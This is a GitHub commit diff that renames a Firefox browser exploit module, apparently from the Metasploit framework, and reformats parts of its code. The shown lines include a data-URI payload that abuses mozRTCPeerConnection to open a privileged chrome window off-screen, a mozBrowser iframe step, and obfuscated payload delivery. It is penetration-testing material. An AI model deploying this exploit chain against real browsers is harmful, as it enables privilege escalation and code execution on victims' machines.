Skip to content

Commit 26cfed6

Browse files
committed
Rename exploit module.
1 parent 96276aa commit 26cfed6

File tree

1 file changed

+6
-2
lines changed

1 file changed

+6
-2
lines changed

modules/exploits/multi/browser/firefox_webidl_javascript_injection.rb renamed to modules/exploits/multi/browser/firefox_webidl_injection.rb

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -73,8 +73,11 @@ def on_request_exploit(cli, request, target_info)
7373
def generate_html(target_info)
7474
key = Rex::Text.rand_text_alpha(5 + rand(12))
7575
frame = Rex::Text.rand_text_alpha(5 + rand(12))
76+
r = Rex::Text.rand_text_alpha(5 + rand(12))
7677
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
77-
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function(){},function(){top.vvv=window.open('chrome://browser/content/browser.xul', 'sd32elf', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
78+
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
79+
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
80+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
7881

7982
js = Rex::Exploitation::JSObfu.new(%Q|
8083
var opts = #{JSON.unparse(opts)};
@@ -109,7 +112,8 @@ def generate_html(target_info)
109112
// (this is important later)
110113
function step2() {
111114
var clear = setInterval(function(){
112-
top.vvv.location ='data:text/html,<html><body><iframe mozBrowser src="about:blank"></iframe></body></html>';
115+
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
116+
'src="about:blank"></iframe></body></html>';
113117
clearInterval(clear);
114118
setTimeout(step3, 100);
115119
}, 10);

0 commit comments

Comments
 (0)